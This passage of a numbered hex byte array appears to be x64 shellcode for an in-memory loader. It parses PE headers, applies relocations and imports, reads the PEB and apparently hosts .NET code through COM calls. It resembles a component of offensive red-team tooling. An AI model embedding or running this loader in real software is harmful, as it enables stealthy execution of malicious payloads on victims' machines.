447 0xdd, 0x8b, 0x0b, 0x8d, 0x41, 0xfd, 0x41, 0x3b, 0xc5, 0x76, 0x50, 0x8d,
448 0x41, 0xff, 0x41, 0x3b, 0xc5, 0x76, 0x15, 0x8d, 0x41, 0xfb, 0x41, 0x3b,
449 0xc5, 0x77, 0x4b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xce, 0xe8, 0x76, 0x09,
450 0x00, 0x00, 0xeb, 0x3e, 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x48, 0x8b, 0xd3,
451 0x48, 0x8b, 0xce, 0xe8, 0x3c, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10,
452 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xce, 0xe8,
453 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8b, 0xce,
454 0xe8, 0xbb, 0xf4, 0xff, 0xff, 0xeb, 0x0b, 0x48, 0x8b, 0xd3, 0x48, 0x8b,
455 0xce, 0xe8, 0xae, 0x04, 0x00, 0x00, 0x8b, 0x86, 0xe4, 0x06, 0x00, 0x00,
456 0x83, 0xe8, 0x02, 0x41, 0x3b, 0xc5, 0x77, 0x34, 0x48, 0x8b, 0x8e, 0x20,
457 0x09, 0x00, 0x00, 0x48, 0x85, 0xc9, 0x74, 0x28, 0x44, 0x8b, 0x86, 0x18,
458 0x09, 0x00, 0x00, 0x33, 0xd2, 0xe8, 0x22, 0x14, 0x00, 0x00, 0x48, 0x8b,
459 0x8e, 0x20, 0x09, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00,
460 0x00, 0x41, 0xff, 0xd7, 0x48, 0x83, 0xa6, 0x20, 0x09, 0x00, 0x00, 0x00,
461 0x44, 0x8b, 0x06, 0x33, 0xd2, 0x8b, 0x9e, 0x30, 0x02, 0x00, 0x00, 0x48,
462 0x8b, 0xce, 0xe8, 0xf5, 0x13, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00,
463 0xc0, 0x00, 0x00, 0x48, 0x8b, 0xce, 0x41, 0xff, 0xd7, 0x83, 0xfb, 0x02,
464 0x75, 0x05, 0x33, 0xc9, 0x41, 0xff, 0xd6, 0x33, 0xc0, 0xe9, 0x72, 0xfc,
465 0xff, 0xff, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x55, 0x56, 0x57,
466 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0xac, 0x24,
467 0xe0, 0xfd, 0xff, 0xff, 0x48, 0x81, 0xec, 0x20, 0x03, 0x00, 0x00, 0x45,
468 0x33, 0xed, 0x33, 0xc0, 0x83, 0x3a, 0x02, 0x0f, 0x57, 0xc0, 0x4d, 0x8b,
469 0xf0, 0x4c, 0x89, 0x6c, 0x24, 0x50, 0x48, 0x8b, 0xf2, 0x48, 0x89, 0x45,
470 0x88, 0x45, 0x8d, 0x7d, 0x01, 0x66, 0x44, 0x89, 0xad, 0x68, 0x02, 0x00,
471 0x00, 0x48, 0x8b, 0xd9, 0x41, 0x8b, 0xfd, 0x0f, 0x11, 0x44, 0x24, 0x78,
472 0x0f, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x48, 0x28, 0x49, 0x8d,
473 0x50, 0x38, 0x48, 0x8b, 0x01, 0xff, 0x90, 0x80, 0x00, 0x00, 0x00, 0x85,
474 0xc0, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x38, 0x48,
475 0x8d, 0x54, 0x24, 0x50, 0x48, 0x8b, 0x01, 0xff, 0x90, 0x90, 0x00, 0x00,
476 0x00, 0x85, 0xc0, 0x0f, 0x88, 0x91, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4c,
477 0x24, 0x50, 0x4c, 0x8d, 0x44, 0x24, 0x48, 0x41, 0x8b, 0xd7, 0xff, 0x93,
478 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c, 0x24, 0x50, 0x4c, 0x8d, 0x44,
479 0x24, 0x44, 0x41, 0x8b, 0xd7, 0xff, 0x93, 0xd0, 0x00, 0x00, 0x00, 0x8b,
480 0x44, 0x24, 0x44, 0x2b, 0x44, 0x24, 0x48, 0x41, 0x03, 0xc7, 0x0f, 0x84,
481 0x2e, 0x01, 0x00, 0x00, 0x41, 0x8d, 0x4d, 0x0c, 0x45, 0x8b, 0xc7, 0x33,
482 0xd2, 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x86, 0x0c, 0x04,
483 0x00, 0x00, 0x33, 0xd2, 0x48, 0x8b, 0xf8, 0x45, 0x38, 0x28, 0x0f, 0x84,
484 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x41, 0xbf, 0x00, 0x01,
485 0x00, 0x00, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x41, 0x83, 0xc9, 0xff, 0x33,
486 0xc9, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x54,
487 0x24, 0x40, 0x48, 0x8d, 0x4d, 0x10, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00,
488 0x44, 0x8b, 0x44, 0x24, 0x40, 0xb9, 0x08, 0x20, 0x00, 0x00, 0x66, 0x89,
489 0x4c, 0x24, 0x60, 0x33, 0xd2, 0x41, 0x8d, 0x4d, 0x08, 0x4c, 0x8b, 0xf8,
490 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xcd, 0x89, 0x8d, 0x78,
491 0x02, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x68, 0x44, 0x39, 0x6c, 0x24,
492 0x40, 0x0f, 0x86, 0x85, 0x00, 0x00, 0x00, 0x45, 0x8d, 0x65, 0x01, 0x49,
493 0x8b, 0x0c, 0xcf, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c,
494 0x24, 0x68, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xc0,
495 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x78, 0x02, 0x00, 0x00,
496 0x41, 0x03, 0xcc, 0x89, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x3b, 0x4c, 0x24,
497 0x40, 0x72, 0xcc, 0x45, 0x8b, 0xfc, 0xeb, 0x4e, 0xb9, 0x08, 0x20, 0x00,
498 0x00, 0x45, 0x8b, 0xc7, 0x66, 0x89, 0x4c, 0x24, 0x60, 0xb9, 0x08, 0x00,
499 0x00, 0x00, 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x68,
500 0x02, 0x00, 0x00, 0x44, 0x89, 0xad, 0x78, 0x02, 0x00, 0x00, 0x48, 0x89,
501 0x44, 0x24, 0x68, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c,
502 0x24, 0x68, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xc0,
503 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xbf, 0x01, 0x00,
504 0x00, 0x00, 0x4c, 0x8d, 0x44, 0x24, 0x60, 0x44, 0x89, 0xad, 0x78, 0x02,
505 0x00, 0x00, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x48, 0x8b, 0xcf,
506 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x38, 0x4c, 0x8d,
507 0x4d, 0xd8, 0xf2, 0x0f, 0x10, 0x4d, 0x88, 0x48, 0x8d, 0x55, 0xa0, 0x66,
508 0x44, 0x89, 0x7c, 0x24, 0x78, 0x4c, 0x8b, 0xc7, 0x4c, 0x89, 0x6d, 0x80,
509 0x0f, 0x10, 0x44, 0x24, 0x78, 0x48, 0x8b, 0x01, 0xf2, 0x0f, 0x11, 0x4d,
510 0xb0, 0x0f, 0x29, 0x45, 0xa0, 0xff, 0x90, 0x28, 0x01, 0x00, 0x00, 0x48,
511 0x85, 0xff, 0x0f, 0x84, 0xee, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x4c, 0x24,
512 0x68, 0xff, 0x93, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x93,
513 0xc0, 0x00, 0x00, 0x00, 0xe9, 0xd5, 0x01, 0x00, 0x00, 0x4d, 0x89, 0x6e,
514 0x38, 0xe9, 0xcc, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x0c, 0x02, 0x00,
515 0x00, 0x41, 0xbf, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44,
516 0x89, 0x7c, 0x24, 0x28, 0x41, 0x83, 0xcc, 0xff, 0x48, 0x89, 0x44, 0x24,
517 0x20, 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x53, 0x70, 0x48,
518 0x8d, 0x4d, 0x10, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44,
519 0x24, 0x58, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x8b, 0x01,
520 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x4c,
521 0x8d, 0x86, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x45,
522 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x4d,
523 0x10, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xe8, 0x48, 0x85,
524 0xc0, 0x0f, 0x84, 0x44, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x28, 0x49,
525 0x8d, 0x46, 0x30, 0x4c, 0x8b, 0xc0, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8b,
526 0xd7, 0x4c, 0x8b, 0x09, 0x41, 0xff, 0x91, 0x88, 0x00, 0x00, 0x00, 0x44,
527 0x8b, 0xf0, 0x85, 0xc0, 0x0f, 0x88, 0x14, 0x01, 0x00, 0x00, 0x33, 0xff,
528 0x4c, 0x8d, 0x86, 0x0c, 0x04, 0x00, 0x00, 0x41, 0x38, 0x38, 0x0f, 0x84,
529 0xa6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44, 0x89, 0x7c, 0x24,
530 0x28, 0x45, 0x8b, 0xcc, 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33,
531 0xc9, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8d, 0x4d,
532 0x10, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x40,
533 0x8d, 0x4f, 0x0c, 0x33, 0xd2, 0x4c, 0x8b, 0xf8, 0xff, 0x93, 0xb0, 0x00,
534 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x74, 0x64, 0x83, 0xa5,
535 0x78, 0x02, 0x00, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x40, 0x00, 0x76, 0x56,
536 0x33, 0xc9, 0x8d, 0x71, 0x08, 0x44, 0x8d, 0x61, 0x01, 0x49, 0x8b, 0x0c,
537 0xcf, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x45, 0xc0, 0x66,
538 0x89, 0x75, 0xc0, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x48, 0x89,
539 0x45, 0xc8, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x44,
540 0x8b, 0xf0, 0x85, 0xc0, 0x79, 0x0b, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0xc0,
541 0x00, 0x00, 0x00, 0x33, 0xff, 0x8b, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x41,
542 0x03, 0xcc, 0x89, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x3b, 0x4c, 0x24, 0x40,
543 0x72, 0xb3, 0x45, 0x85, 0xf6, 0x78, 0x52, 0x48, 0x8b, 0x4d, 0x90, 0x48,
544 0x8d, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x30, 0x0f, 0x57, 0xc0, 0x48,
545 0x8d, 0x55, 0xa0, 0x0f, 0x29, 0x45, 0xa0, 0xf2, 0x0f, 0x10, 0x45, 0x88,
546 0x45, 0x33, 0xc9, 0x48, 0x8b, 0x09, 0x41, 0xb8, 0x18, 0x01, 0x00, 0x00,
547 0x48, 0x89, 0x7c, 0x24, 0x28, 0x48, 0x89, 0x54, 0x24, 0x20, 0x49, 0x8b,
548 0xd5, 0xf2, 0x0f, 0x11, 0x45, 0xb0, 0x48, 0x8b, 0x01, 0xff, 0x90, 0xc8,
549 0x01, 0x00, 0x00, 0x48, 0x85, 0xff, 0x74, 0x09, 0x48, 0x8b, 0xcf, 0xff,
550 0x93, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x7c, 0x24, 0x58, 0x49, 0x8b,
551 0xcd, 0xff, 0x93, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x93,
552 0xe0, 0x00, 0x00, 0x00, 0x41, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x41, 0x8b,
553 0xc7, 0x48, 0x8b, 0x9c, 0x24, 0x60, 0x03, 0x00, 0x00, 0x48, 0x81, 0xc4,
554 0x20, 0x03, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c,
555 0x5f, 0x5e, 0x5d, 0xc3, 0x48, 0x89, 0x54, 0x24, 0x10, 0x53, 0x55, 0x56,
556 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec,
557 0x58, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0xaa, 0x28, 0x05, 0x00, 0x00, 0x48,
558 0x8b, 0xf1, 0x49, 0x63, 0x7d, 0x3c, 0x45, 0x33, 0xe4, 0x49, 0x03, 0xfd,
559 0x4c, 0x89, 0xa4, 0x24, 0xb8, 0x02, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x89,
560 0xbc, 0x24, 0xa0, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xfa, 0x4c, 0x89, 0x6c,
561 0x24, 0x30, 0xff, 0x56, 0x40, 0x48, 0x89, 0x84, 0x24, 0xb0, 0x02, 0x00,
562 0x00, 0x4c, 0x63, 0x40, 0x3c, 0x45, 0x0f, 0xb7, 0x4c, 0x00, 0x04, 0x66,
563 0x44, 0x39, 0x4f, 0x04, 0x0f, 0x85, 0x0b, 0x04, 0x00, 0x00, 0x8b, 0x57,
564 0x50, 0x45, 0x8d, 0x4c, 0x24, 0x40, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x33,
565 0xc9, 0x03, 0xd0, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xff, 0x56, 0x48,
566 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe5, 0x03, 0x00, 0x00,
567 0x44, 0x8b, 0x47, 0x54, 0x49, 0x8b, 0xd5, 0x48, 0x8b, 0xc8, 0xe8, 0xe1,
568 0x0e, 0x00, 0x00, 0x0f, 0xb7, 0x6f, 0x14, 0x45, 0x8b, 0xf4, 0x48, 0x03,
569 0xef, 0x66, 0x44, 0x3b, 0x67, 0x06, 0x73, 0x2d, 0x41, 0x8b, 0xc6, 0x4c,
570 0x8d, 0x04, 0x80, 0x42, 0x8b, 0x54, 0xc5, 0x2c, 0x42, 0x8b, 0x4c, 0xc5,
571 0x24, 0x49, 0x03, 0xd5, 0x46, 0x8b, 0x44, 0xc5, 0x28, 0x48, 0x03, 0xcb,
572 0xe8, 0xaf, 0x0e, 0x00, 0x00, 0x0f, 0xb7, 0x47, 0x06, 0x41, 0xff, 0xc6,
573 0x44, 0x3b, 0xf0, 0x72, 0xd3, 0x8b, 0x87, 0xb0, 0x00, 0x00, 0x00, 0x85,
574 0xc0, 0x74, 0x76, 0x4c, 0x8b, 0xf3, 0x4c, 0x8d, 0x0c, 0x03, 0x4c, 0x2b,
575 0x77, 0x30, 0x45, 0x39, 0x21, 0x74, 0x66, 0xbd, 0x00, 0x10, 0x00, 0x00,
576 0x4d, 0x8d, 0x51, 0x08, 0xeb, 0x47, 0x41, 0x0f, 0xb7, 0x02, 0xb9, 0x00,
577 0xf0, 0x00, 0x00, 0x44, 0x0f, 0xb7, 0xd8, 0x66, 0x23, 0xc1, 0xb9, 0x00,
578 0xa0, 0x00, 0x00, 0x66, 0x3b, 0xc1, 0x75, 0x1f, 0x45, 0x8b, 0x01, 0x41,
579 0x81, 0xe3, 0xff, 0x0f, 0x00, 0x00, 0x4b, 0x8d, 0x04, 0x03, 0x48, 0x8b,
580 0x14, 0x18, 0x4b, 0x8d, 0x04, 0x03, 0x49, 0x03, 0xd6, 0x48, 0x89, 0x14,
581 0x18, 0xeb, 0x0a, 0x66, 0x44, 0x3b, 0xdd, 0x0f, 0x83, 0x22, 0x03, 0x00,
582 0x00, 0x49, 0x83, 0xc2, 0x02, 0x41, 0x8b, 0x41, 0x04, 0x49, 0x03, 0xc1,
583 0x4c, 0x3b, 0xd0, 0x75, 0xad, 0x4d, 0x8b, 0xca, 0x45, 0x39, 0x22, 0x75,
584 0x9f, 0x8b, 0x87, 0x90, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x98,
585 0x00, 0x00, 0x00, 0x48, 0x8d, 0x2c, 0x03, 0x8b, 0x45, 0x0c, 0x85, 0xc0,
586 0x0f, 0x84, 0x89, 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x48, 0x03, 0xcb, 0xff,
587 0x56, 0x30, 0x44, 0x8b, 0x75, 0x00, 0x48, 0x8b, 0xf8, 0x44, 0x8b, 0x6d,
588 0x10, 0x4c, 0x03, 0xf3, 0x4c, 0x03, 0xeb, 0xeb, 0x4c, 0x79, 0x0b, 0x0f,
589 0xb7, 0xd1, 0x48, 0x8b, 0xcf, 0xff, 0x56, 0x38, 0xeb, 0x33, 0x41, 0x83,
590 0x7f, 0x04, 0x00, 0x4c, 0x8d, 0x24, 0x19, 0x74, 0x1a, 0x49, 0x8d, 0x54,
591 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0xca, 0xf2, 0xff, 0xff, 0x85, 0xc0,
592 0x74, 0x09, 0x48, 0x8b, 0x86, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x49,
593 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xcf, 0xff, 0x56, 0x38, 0x45, 0x33,
594 0xe4, 0x49, 0x83, 0xc6, 0x08, 0x49, 0x89, 0x45, 0x00, 0x49, 0x83, 0xc5,
595 0x08, 0x49, 0x8b, 0x0e, 0x48, 0x85, 0xc9, 0x75, 0xac, 0x8b, 0x45, 0x20,
596 0x48, 0x83, 0xc5, 0x14, 0x85, 0xc0, 0x75, 0x86, 0x48, 0x8b, 0xbc, 0x24,
597 0xa0, 0x02, 0x00, 0x00, 0x4d, 0x8d, 0xaf, 0x28, 0x05, 0x00, 0x00, 0x8b,
598 0x87, 0xf0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x72, 0x4c, 0x8d, 0x73,
599 0x04, 0x4c, 0x03, 0xf0, 0x41, 0x8b, 0x06, 0x85, 0xc0, 0x74, 0x64, 0x8b,
600 0xc8, 0x48, 0x03, 0xcb, 0xff, 0x56, 0x30, 0x4c, 0x8b, 0xe0, 0x48, 0x85,
601 0xc0, 0x74, 0x3e, 0x45, 0x8b, 0x7e, 0x0c, 0x41, 0x8b, 0x6e, 0x08, 0x4c,
602 0x03, 0xfb, 0x48, 0x03, 0xeb, 0xeb, 0x26, 0x48, 0x8b, 0x46, 0x38, 0x48,
603 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xd1, 0xeb, 0x07, 0x48, 0x8d, 0x53,
604 0x02, 0x48, 0x03, 0xd1, 0x49, 0x8b, 0xcc, 0xff, 0xd0, 0x49, 0x83, 0xc7,
605 0x08, 0x48, 0x89, 0x45, 0x00, 0x48, 0x83, 0xc5, 0x08, 0x49, 0x8b, 0x0f,
606 0x48, 0x85, 0xc9, 0x75, 0xd2, 0x49, 0x83, 0xc6, 0x20, 0x45, 0x33, 0xe4,
607 0x41, 0x8b, 0x06, 0x85, 0xc0, 0x75, 0xa4, 0x4c, 0x8b, 0xbc, 0x24, 0xa8,
608 0x02, 0x00, 0x00, 0x8b, 0x87, 0xd0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74,
609 0x24, 0x4c, 0x8b, 0x74, 0x18, 0x18, 0x4d, 0x85, 0xf6, 0x74, 0x1a, 0xeb,
610 0x10, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xcb, 0x41, 0x8d, 0x50, 0x01, 0xff,
611 0xd0, 0x4d, 0x8d, 0x76, 0x08, 0x49, 0x8b, 0x06, 0x48, 0x85, 0xc0, 0x75,
612 0xe8, 0x8b, 0x6f, 0x28, 0x48, 0x03, 0xeb, 0x41, 0x83, 0x3f, 0x03, 0x0f,
613 0x85, 0x16, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8c, 0x24, 0xb0, 0x02, 0x00,
614 0x00, 0x45, 0x33, 0xc0, 0x41, 0x8d, 0x50, 0x01, 0xff, 0xd5, 0x49, 0x8d,
615 0x97, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x89, 0x94, 0x24, 0xa0, 0x02, 0x00,
616 0x00, 0x44, 0x38, 0x22, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0x8b, 0x87,
617 0x88, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x73, 0x01, 0x00, 0x00,
618 0x48, 0x03, 0xc3, 0x8b, 0x68, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x65, 0x01,
619 0x00, 0x00, 0x44, 0x8b, 0x70, 0x1c, 0x44, 0x8b, 0x60, 0x20, 0x4c, 0x03,
620 0xf3, 0x44, 0x8b, 0x78, 0x24, 0x4c, 0x03, 0xe3, 0x4c, 0x03, 0xfb, 0xff,
621 0xcd, 0x41, 0x8b, 0x0c, 0xac, 0x48, 0x03, 0xcb, 0xe8, 0x97, 0x0c, 0x00,
622 0x00, 0x85, 0xc0, 0x74, 0x0e, 0x85, 0xed, 0x74, 0x18, 0x48, 0x8b, 0x94,
623 0x24, 0xa0, 0x02, 0x00, 0x00, 0xeb, 0xe0, 0x41, 0x0f, 0xb7, 0x04, 0x6f,
624 0x45, 0x8b, 0x34, 0x86, 0x4c, 0x03, 0xf3, 0xeb, 0x08, 0x4c, 0x8b, 0xb4,
625 0x24, 0xb8, 0x02, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x48,
626 0x8b, 0xcb, 0xe8, 0x45, 0x0c, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33,
627 0xd2, 0x48, 0x8b, 0x4c, 0x24, 0x30, 0xe8, 0x35, 0x0c, 0x00, 0x00, 0x4d,
628 0x85, 0xf6, 0x0f, 0x84, 0xf3, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xac, 0x24,
629 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xbd, 0x0c, 0x04, 0x00, 0x00, 0x80,
630 0x3f, 0x00, 0x74, 0x43, 0x8b, 0x85, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0,
631 0x74, 0x26, 0x48, 0x8d, 0x44, 0x24, 0x40, 0xc7, 0x44, 0x24, 0x28, 0x00,
632 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x44, 0x24, 0x20,
633 0x4c, 0x8b, 0xc7, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70, 0x8b, 0x85,
634 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x48,
635 0x0f, 0x44, 0xcf, 0x41, 0xff, 0xd6, 0xe9, 0x9c, 0x00, 0x00, 0x00, 0x41,
636 0xff, 0xd6, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x4d, 0x8d, 0x87, 0x0c, 0x04,
637 0x00, 0x00, 0x45, 0x38, 0x20, 0x74, 0x2a, 0x48, 0x8d, 0x44, 0x24, 0x40,
638 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff,
639 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70,
640 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8b, 0xce, 0xe8, 0x7f, 0x03, 0x00,
641 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x48, 0x8b, 0xcb, 0xe8, 0x89,
642 0x0b, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x49, 0x8b, 0xcd,
643 0xe8, 0x7b, 0x0b, 0x00, 0x00, 0x45, 0x39, 0x67, 0x04, 0x74, 0x2d, 0x4c,
644 0x89, 0x64, 0x24, 0x28, 0x45, 0x33, 0xc9, 0x4c, 0x8b, 0xc5, 0x44, 0x89,
645 0x64, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0x88, 0x00, 0x00,
646 0x00, 0x48, 0x85, 0xc0, 0x74, 0x1d, 0x83, 0xca, 0xff, 0x48, 0x8b, 0xc8,
647 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0xeb, 0x0f, 0x65, 0x48, 0x8b, 0x0c,
648 0x25, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x49, 0x60, 0xff, 0xd5, 0x33,
649 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xff, 0x56,
650 0x50, 0x48, 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e,
651 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
652 0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x20, 0x55, 0x57,
653 0x41, 0x56, 0x48, 0x8d, 0xac, 0x24, 0xc0, 0xfc, 0xff, 0xff, 0x48, 0x81,
654 0xec, 0x40, 0x04, 0x00, 0x00, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf1, 0x48,
655 0x8b, 0x91, 0x18, 0x09, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00,
656 0x33, 0xc9, 0x48, 0x8d, 0x14, 0x55, 0x02, 0x00, 0x00, 0x00, 0x44, 0x8d,
657 0x49, 0x04, 0xff, 0x56, 0x48, 0x4c, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x0f,
658 0x84, 0x94, 0x02, 0x00, 0x00, 0x8b, 0x8b, 0x24, 0x05, 0x00, 0x00, 0x4c,
659 0x8d, 0x83, 0x28, 0x05, 0x00, 0x00, 0x03, 0xc9, 0x83, 0xcb, 0xff, 0x89,
660 0x4c, 0x24, 0x28, 0x44, 0x8b, 0xcb, 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24,
661 0x20, 0x33, 0xd2, 0xff, 0x56, 0x70, 0x83, 0x65, 0xe8, 0x00, 0x48, 0x8d,
662 0x45, 0x80, 0x83, 0x65, 0xf8, 0x00, 0x48, 0x8d, 0x55, 0x08, 0x48, 0x89,
663 0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x94, 0xe3, 0xff, 0xff,
664 0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0x19,
665 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0x76, 0xe2,
666 0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0xf3, 0xe2, 0xff,
667 0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0x70, 0xe2, 0xff, 0xff,
668 0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0x61, 0xe2, 0xff, 0xff, 0x48,
669 0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0x56, 0xe2, 0xff, 0xff, 0x48, 0x89,
670 0x45, 0xb0, 0x48, 0x8d, 0x05, 0x4b, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45,
671 0xb8, 0x48, 0x8d, 0x05, 0xd8, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
672 0x48, 0x8d, 0x05, 0x35, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
673 0x8d, 0x05, 0x2a, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
